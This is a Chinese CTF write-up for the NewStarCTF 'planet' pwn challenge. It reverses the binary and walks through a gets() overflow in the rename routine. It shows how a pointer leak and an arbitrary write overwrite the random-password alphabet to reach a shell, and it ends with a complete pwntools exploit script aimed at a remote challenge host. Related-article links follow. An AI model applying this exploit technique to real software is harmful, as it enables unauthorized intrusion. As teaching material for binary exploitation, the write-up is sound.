这道题目更多是考pwner的逆向功底(虽然程序逻辑也不是非常复杂=_=)

老规矩,先checksec查看程序



保护全开

看一下main函数

__int64 __fastcall main(int a1, char **a2, char **a3)

{

  unsigned int v4; // eax

  char s1[88]; // [rsp+20h] [rbp-60h] BYREF

  unsigned __int64 v6; // [rsp+78h] [rbp-8h]

  v6 = __readfsqword(0x28u);

  alarm(0x78u);

  printf("Passwd: ");

  fflush(stdout);

  gets(s1);

  if ( !strcmp(s1, "secret_passwd_anti_bad_guys") )

  {

    v4 = time(0LL);

    srand(v4);

    sub_13E7();

    sub_1929();

  }

  return 0LL;

}

这里执行了两个函数sub_13E7(); sub_1929();,跟进去看一下

unsigned int sub_13E7()

{

  puts("Welcome in a new dimension...");

  fflush(stdout);

  puts("\t...Boooom... the big bang sound...");

  fflush(stdout);

  sub_12F2();

  sleep(1u);

  puts("\t\ta new universe has begun, with new physics laws...");

  fflush(stdout);

  puts("\t...here stacks look safe!");

  fflush(stdout);

  return sleep(1u);

}

跟进函数sub_12F2();

char *sub_12F2()

{

  char *result; // rax

  int i; // [rsp+4h] [rbp-1Ch]

  char *v2; // [rsp+8h] [rbp-18h]

  char *dest; // [rsp+10h] [rbp-10h]

  char *src; // [rsp+18h] [rbp-8h]

  char *srca; // [rsp+18h] [rbp-8h]

  dest = (char *)malloc(0x28uLL);

  ::dest = dest;

  *((_QWORD *)dest + 4) = 0LL;

  src = (char *)sub_1245(5LL);

  strcpy(dest, src);

  *((_QWORD *)dest + 2) = &dword_40D0;

  free(src);

  for ( i = 0; i <= 9; ++i )

  {

    v2 = (char *)malloc(0x28uLL);

    srca = (char *)sub_1245(5LL);

    strcpy(v2, srca);

    free(srca);

    *((_QWORD *)v2 + 2) = &dword_40D0;

    *((_QWORD *)dest + 3) = v2;

    *((_QWORD *)v2 + 4) = dest;

    dest = v2;

  }

  result = v2;

  *((_QWORD *)v2 + 3) = 0LL;

  return result;

}

这里就比较有意思了,很明显全局变量::dest不是简单的字符串指针,根据下面的代码

	dest = (char *)malloc(0x28uLL);

  	::dest = dest;

	.........

    v2 = (char *)malloc(0x28uLL);

	.........

	*((_QWORD *)dest + 3) = v2;

    *((_QWORD *)v2 + 4) = dest;

    dest = v2;

是不是感觉有些眼熟,这个函数就是双向链表的建立。现在我们创建一个结构体,然后将结构体映射到变量上

00000000 Plane struc ; (sizeof=0x28, mappedto_8)

00000000 str db 16 dup(?)

00000010 level dq ?                              ; offset

00000018 next dq ?                               ; offset

00000020 prev dq ?                               ; offset

00000028 Plane ends

00000028

这是修改后的代码,可读性是不是高多了。流程就是创建一个长度为11的双向链表,::dest为头结点,链表的数据域里存一个char str[16]数组和int *p指针,str为从字母表中生成的长度为5的随机字符串,int指针指向一个全局变量。(注意:::destdword_40D0两个全局变量被我重命名为 head 和 global_level)

Plane *CreateLinklist()

{

  Plane *result; // rax

  int i; // [rsp+4h] [rbp-1Ch]

  Plane *p; // [rsp+8h] [rbp-18h]

  Plane *dest; // [rsp+10h] [rbp-10h]

  char *src; // [rsp+18h] [rbp-8h]

  char *srca; // [rsp+18h] [rbp-8h]

  dest = (Plane *)malloc(0x28uLL);

  head = dest;

  dest->prev = 0LL;

  src = RandomCode(5);

  strcpy(dest->str, src);

  dest->level = &global_level;

  free(src);

  for ( i = 0; i <= 9; ++i )

  {

    p = (Plane *)malloc(0x28uLL);

    srca = RandomCode(5);

    strcpy(p->str, srca);

    free(srca);

    p->level = &global_level;

    dest->next = p;

    p->prev = dest;

    dest = p;

  }

  result = p;

  p->next = 0LL;

  return result;

}

好,第一个函数sub_13E7();分析完了,现在分析第二个函数sub_1929();

void sub_1929()

{

  int i; // [rsp+8h] [rbp-68h]

  char s1[88]; // [rsp+10h] [rbp-60h] BYREF

  unsigned __int64 v2; // [rsp+68h] [rbp-8h]

  v2 = __readfsqword(0x28u);

  while ( 1 )

  {

    printf("What is your next move? (Help)\n>");

    fflush(stdout);

    gets(s1);

    for ( i = 0; i <= 9; ++i )

    {

      if ( !strcmp(s1, off_4100[i]) )

      {

        funcs_19CE[i]();

        i = 10;

      }

    }

  }

}

这里的逻辑很明显就是菜单选择,存在一个字符串指针数组off_4100和函数指针表funcs_19CE,将用户输入的字串与字符串数组比较,找到对应的位置则执行函数指针表中对应的操作。

这里是两个指针数组对应的数据(为了方便阅读,这里我对一些函数和变量进行了重命名)

0000000000004100 08 20 00 00 00 00 00 00       cmd_list dq offset aHelp                ; DATA XREF: Choice+6A↑o

.data:0000000000004100                                                                       ; "Help"

.data:0000000000004108 0D 20 00 00 00 00 00 00       dq offset aExit_0                       ; "Exit"

.data:0000000000004110 12 20 00 00 00 00 00 00       dq offset aJump                         ; "Jump"

.data:0000000000004118 17 20 00 00 00 00 00 00       dq offset aGetname                      ; "GetName"

.data:0000000000004120 1F 20 00 00 00 00 00 00       dq offset aRename                       ; "Rename"

.data:0000000000004128 26 20 00 00 00 00 00 00       dq offset aCheck                        ; "Check"

.data:0000000000004130 2C 20 00 00 00 00 00 00       dq offset aGoback                       ; "GoBack"

.data:0000000000004138 33 20 00 00 00 00 00 00       dq offset aSearch                       ; "Search"

.data:0000000000004140 3A 20 00 00 00 00 00 00       dq offset aNap                          ; "Nap"

.data:0000000000004148 3E 20 00 00 00 00 00 00       dq offset aAdmin                        ; "Admin"

.data:0000000000004150 00 00 00 00 00 00 00 00 00 00+align 20h

.data:0000000000004160 78 14 00 00 00 00 00 00 9E 14+func_list dq offset sub_1478            ; DATA XREF: Choice+95↑o

.data:0000000000004160 00 00 00 00 00 00 AC 14 00 00+                                        ; Choice+9C↑r

.data:0000000000004160 00 00 00 00 54 15 00 00 00 00+dq offset sub_149E

.data:0000000000004160 00 00 89 15 00 00 00 00 00 00+dq offset Next

.data:0000000000004160 86 16 00 00 00 00 00 00 0F 16+dq offset GetName

.data:0000000000004160 00 00 00 00 00 00 FF 16 00 00+dq offset SetName

.data:0000000000004160 00 00 00 00 4A 17 00 00 00 00+dq offset Back

.data:0000000000004160 00 00 D3 17 00 00 00 00 00 00 dq offset Check

.data:0000000000004160                               dq offset sub_16FF

.data:0000000000004160                               dq offset nap

.data:0000000000004160                               dq offset Admin

.data:00000000000041B0                               ; __int64 (*off_41B0)(void)

.data:00000000000041B0 86 18 00 00 00 00 00 00       off_41B0 dq offset getshell             ; DATA XREF: Admin:loc_185D↑r

这里关键的函数有四个Next GetName SetName Admin

先分析Admin函数

__int64 Admin()

{

  const char *v0; // rsi

  char s1[88]; // [rsp+0h] [rbp-60h] BYREF

  unsigned __int64 v3; // [rsp+58h] [rbp-8h]

  v3 = __readfsqword(0x28u);

  printf("Insert the secret passwd\n> ");

  fflush(stdout);

  gets(s1);

  v0 = RandomCode(30);

  if ( !strcmp(s1, v0) )

  {

    off_41B0();

  }

  else

  {

    puts("Password is wrong");

    fflush(stdout);

  }

  return 0LL;

}

程序生成一个长度为30的随机字符串,若输入的密码与它一致即可获取shell。

这里有两种利用方案,一是修改srand函数的初始值为一个定值,然后根据这个种子生成的数字序列来获得程序生成的字符串。但是回看main函数,储存初始值的变量v4为寄存器变量,不在栈上面,无法被修改。而且初始值的赋值在gets函数之后,即使有条件修改也会被覆盖,故此方法行不通。

二是修改.data段的字母表的数据全为同一个值,这样无论怎么随机生成的也是长度为30的固定字符串。

00000000000040D0 01 00 00 00                   global_level dd 1

00000000000040D4 00 00 00 00 00 00 00 00 00 00+db 0Ch dup(0)

00000000000040E0 61 62 63 64 65 66 67 68 69 6A+aAbcdefghijklmn db 'abcdefghijklmnopqrstuvwxyz',0

接下来分析剩下的三个函数

__int64 Next()

{

  puts("I'm going to the next planet...");

  fflush(stdout);

  if ( (global_level & 1) != 0 )

  {

    ++global_level;

    if ( head->next )

    {

      head = head->next;

    }

    else

    {

      puts("I can't... the next planet is a black hole");

      fflush(stdout);

    }

    return 0LL;

  }

  else

  {

    puts("Sorry, I'm too tired, I need a nap!");

    fflush(stdout);

    return 0LL;

  }

}

__int64 GetName()

{

  printf("I'm on the planet called: %s\n", head->str);

  fflush(stdout);

  return 0LL;

}

__int64 SetName()

{

  size_t v0; // rax

  char s[40]; // [rsp+0h] [rbp-30h] BYREF

  unsigned __int64 v3; // [rsp+28h] [rbp-8h]

  v3 = __readfsqword(0x28u);

  puts("Enter the new name");

  fflush(stdout);

  gets(s);                                      // data overwrite

  v0 = strlen(s);

  strncpy(head->str, s, v0);

  return 0LL;

}

看完这三个函数应该有思路了吧。

SetName函数存在明显的数据覆盖漏洞,可以将链表的指针域覆写为目标地址,然后实现任意地址写。

攻击思路:将链表内的字符数组填满,利用GetName函数可以泄露全局变量global_level的地址,这就相当于泄露了字母表字符串的地址,然后通过SetName修改链表的Next指针为字母表地址,再执行Next函数,使要修改的地址为字母表地址,接着执行SetName函数将字母表覆盖为单一数据,最后执行Admin函数输入密码即可获取shell。

exp:

from pwn import *

context(arch = "amd64",os = "linux",log_level = "debug")

local = 0

if local:

    io = process("./pwn")

else:

    io = remote("node4.buuoj.cn", 28455)

def start():

    io.recvuntil(b"Passwd: ")

    io.sendline(b"secret_passwd_anti_bad_guys")

def rename(content):

    io.sendlineafter(b"next move? (Help)\n>", b"Rename")

    io.sendline(content)

def getname():

    io.sendlineafter(b"next move? (Help)\n>", b"GetName")

def getShell():

    io.sendlineafter(b"next move? (Help)\n>", b"Admin")

    io.sendlineafter(b"passwd\n> ",b'a'*30)

def Next():

    io.sendlineafter(b"next move? (Help)\n>", b"Jump")

def Back():

    io.sendlineafter(b"next move? (Help)\n>", b"Check")

start()

rename(b'a'*16)

getname()

io.recvuntil(b"planet called: ")

leakAddr = u64(io.recv(16+6)[16:].ljust(8,b'\x00'))

payload = b'a'*0x18+p64(leakAddr+0x10)

rename(payload)

Next()

rename(b"a"*26)

getname()

getShell()

io.interactive()

[NewStarCTF WEEK5] pwn-planet 详解的更多相关文章

  1. [BUUCTF]PWN——ciscn_2019_es_7[详解]

    ciscn_2019_es_7 附件 步骤: 例行检查,64位程序,开启了nx保护 本地试运行一下看看大概的情况 64位ida载入,关键函数很简单,两个系统调用,buf存在溢出 看到系统调用和溢出,想 ...

  2. mvn详解

    1.前言 Maven,发音是[`meivin],"专家"的意思.它是一个很好的项目管理工具,很早就进入了我的必备工具行列,但是这次为了把project1项目完全迁移并应用maven ...

  3. Unity Jobsystem 详解实体组件系统ECS

    原文摘选自Unity Jobsystem 详解实体组件系统ECS 简介 随着ECS的加入,Unity基本上改变了软件开发方面的大部分方法.ECS的加入预示着OOP方法的结束.随着实体组件系统ECS的到 ...

  4. maven pom文件详解

    http://www.blogjava.net/hellxoul/archive/2013/05/16/399345.html http://blog.csdn.net/houpengfei111/a ...

  5. Linq之旅:Linq入门详解(Linq to Objects)

    示例代码下载:Linq之旅:Linq入门详解(Linq to Objects) 本博文详细介绍 .NET 3.5 中引入的重要功能:Language Integrated Query(LINQ,语言集 ...

  6. 架构设计:远程调用服务架构设计及zookeeper技术详解(下篇)

    一.下篇开头的废话 终于开写下篇了,这也是我写远程调用框架的第三篇文章,前两篇都被博客园作为[编辑推荐]的文章,很兴奋哦,嘿嘿~~~~,本人是个很臭美的人,一定得要截图为证: 今天是2014年的第一天 ...

  7. EntityFramework Core 1.1 Add、Attach、Update、Remove方法如何高效使用详解

    前言 我比较喜欢安静,大概和我喜欢研究和琢磨技术原因相关吧,刚好到了元旦节,这几天可以好好学习下EF Core,同时在项目当中用到EF Core,借此机会给予比较深入的理解,这里我们只讲解和EF 6. ...

  8. Java 字符串格式化详解

    Java 字符串格式化详解 版权声明:本文为博主原创文章,未经博主允许不得转载. 微博:厉圣杰 文中如有纰漏,欢迎大家留言指出. 在 Java 的 String 类中,可以使用 format() 方法 ...

  9. Android Notification 详解(一)——基本操作

    Android Notification 详解(一)--基本操作 版权声明:本文为博主原创文章,未经博主允许不得转载. 微博:厉圣杰 源码:AndroidDemo/Notification 文中如有纰 ...

  10. Android Notification 详解——基本操作

    Android Notification 详解 版权声明:本文为博主原创文章,未经博主允许不得转载. 前几天项目中有用到 Android 通知相关的内容,索性把 Android Notificatio ...

随机推荐

  1. Thinkphp 5.x 远程代码执行漏洞利用小记

    Thinkphp 5.x远程代码执行漏洞存在于Thinkphp 5.0版本及5.1版本,通过此漏洞,可以在远程执行任意代码,也可写入webshell 下面是对其进行的漏洞利用! 漏洞利用: 1,利用s ...

  2. 聚焦Web前端安全:最新揭秘漏洞防御方法

    在 Web 安全中,服务端一直扮演着十分重要的角色.然而前端的问题也不容小觑,它也会导致信息泄露等诸如此类的问题.在这篇文章中,我们将向读者介绍如何防范Web前端中的各种漏洞.[万字长文,请先收藏再阅 ...

  3. springboot整合nacos和dubbo

    0. 源码 源码: gitee 1. 版本 java: 1.8.0_281 nacos: 2.1.2 2. 创建项目 创建一个简单的springboot或者maven项目, 或者代码库(gitee/g ...

  4. C# QRCode二维码的解析与生成

    已知一张二维码图片,怎么生成一张一模一样的图片出来? 最近有个项目,需要用到QRCode,之前只做过Datamatrix格式的,想着应该也是差不多的,于是就依葫芦画瓢,掏出我的陈年OnBarcode类 ...

  5. C#系统锁屏事件例子 - 开源研究系列文章

    今天有个网友问了个关于操作系统锁屏的问题. 我们知道,操作系统是基于消息和事件处理的,所以我们只要找到该操作系统锁屏和解屏的那个事件,然后在事件里进行处理即可.下面是例子介绍. 1. 项目目录: 下面 ...

  6. Vue3 中 keepAlive 如何搭配 VueRouter 来更自由的控制页面的状态缓存?

    在 vue 中,默认情况下,一个组件实例在被替换掉后会被销毁.这会导致它丢失其中所有已变化的状态--当这个组件再一次被显示时,会创建一个只带有初始状态的新实例.但是 vue 提供了 keep-aliv ...

  7. ChatGPT如何生成可视化图表-示例中国近几年出生人口

    本教程收集于:AIGC从入门到精通教程汇总 ChatGPT本身不能直接生成可视化图表,但可以配合其他可视化工具或库 方法一:前端可视化开发库 Echarts(地址:Apache ECharts ) 方 ...

  8. 微服务下使用maven做多环境配置

    分享技术,用心生活 前言:很多项目在开发,提测,上线时都会提前手动改一些配置文件来适应对应环境,麻烦不说了,而且也容易出错:生产环境的配置也容易暴露.基于此,我们基于spring cloud alib ...

  9. ELK环境部署-LogStash数据收集(二)

    一.安装JAVA环境 1.解压jdk压缩包 abc@elk:~$ sudo tar -zxvf jdk-11.0.18_linux-x64_bin.tar.gz -c jdk11 2.添加环境变量 a ...

  10. CodeForces 1388D Captain Flint and Treasure

    题意 给长度为\(n\)的序列\(a[n]\)和\(b[n]\),初始时\(ans=0\),有以下操作: \(ans=ans+a[i]\) 如果\(b[i]\neq-1\),则\(a[b[i]]=a[ ...